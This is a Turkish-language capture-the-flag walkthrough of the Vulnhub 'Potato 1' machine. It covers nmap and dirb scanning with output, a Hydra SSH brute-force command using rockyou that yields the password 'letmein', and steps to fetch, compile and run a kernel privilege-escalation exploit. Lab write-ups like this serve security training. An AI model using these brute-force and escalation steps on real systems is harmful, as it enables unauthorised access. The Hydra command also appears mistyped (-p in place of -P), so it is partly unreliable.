Potato 1 (SunCSR)
Potato 1 (SunCSR) Makine Çözümü
Vulnhub Potato 1 makine çözümü.
Önce makineyi kurulumunu yapın, her hangi bir sorun yaşamadığınızdan emin olun.
Bilgi Toplama
Bilgi toplamaya geçmeden önce makinenin IP adresini bulmalısınız. IP adresini bulmak için çeşitli yöntemler var ben nmap ile pingleyerek buldum, bu kısmı yazıya koymayacağım.
Öncelikle nmap ile makineyi tarıyoruz:
$ nmap 192.168.1.4 -T5 -p- -A >> sonuc
Nmap scan report for 192.168.1.4
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Potato
7120/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
| 2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
| 256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_ 256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 08:00:27:34:97:D8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.1.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.67 seconds
HTTP – Web Sayfasının İncelenmesi
Hiç vakit kaybetmeden sayfayı tersyüz edelim.
$ dirb http://192.168.1.4
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Sep 16 20:57:32 2020
URL_BASE: http://192.168.1.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.4/ ----
+ http://192.168.1.4/index.html (CODE:200|SIZE:654)
+ http://192.168.1.4/info.php (CODE:200|SIZE:87483)
+ http://192.168.1.4/server-status (CODE:403|SIZE:291)
-----------------
END_TIME: Wed Sep 16 20:57:34 2020
DOWNLOADED: 4612 - FOUND: 3
Burada da mevcut php sürümü ile ilgili çeşitli bilgiler yer alıyor. Sayfadaki bilgileri detaylıca inceledikten sonra buradan da işe yarar bir şey çıkmayınca yüzümüzü ssh‘a çeviriyoruz.
Saldırı
SSH – BruteForce
Aklıma ilk gelen 7120.Portta bulunan bu ssh servisine bir bruteforce başlatmak oldu. BruteForce esnasında servisin versiyon bilgilerini aratarak daha önce exploit edilip edilmediğini araştırdım fakat yeterli sonuçlara varamadım.
KB-VULN1‘in çözümünde tool olarak Metasploit’i kullanmıştım bu seferki saldırıda Hydra’yı kullandım , saldırıya başlamadan önce şu adımları izleyerek hazırlığınızı yapın:
- BruteForce için tool’un bulunması (Kullanılan: Hydra[CLI])
- Saldırıda kullanılacak wordlistin seçilmesi (Kullanılan: Rockyou)
- Hedef ile olan bağlantının test edilmesi
- Saldırı için toolun hazırlanması
- Saldırı
Saldırıya başlamadan önce bir kullanıcı adı seçilmeli. Saldırı için kullanıcı adı olarak aklıma ilke gelen (ve mantıklı olan) potato kullanıcı adını tercih ettim.
$ hydra -l potato -p /usr/share/wordlists/rockyou.txt 192.168.1.4 -t 4 ssh -s 7120
Yukarıdaki kodu çalıştırarak saldırıyı başlattım.
Kısa bir süre sonra şifre kırıldı, letmein. Şifreyi aldıktan sonra ssh ile makineye bağlantı kurun.
Yetki Yükseltme – Kernel Privilege Escalation
Ssh ile makineye bağlandıktan sonra yetki yükseltmek için kernel hakkında bilgi toplamaya başladım.
$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Kernel hakkında kısa bir privilege escalatin exploit araştırması yaptım ve exploit-db‘de ihtiyacım olan kodu buldum. Bundan sonra yapılan işlemler gayet basit.
Sırasıyla:
- tmp konumuna git
- wget ile exploiti al
- gcc ile derle
- derlenmiş programı çalıştır
Yorumlar
Yorum Gönder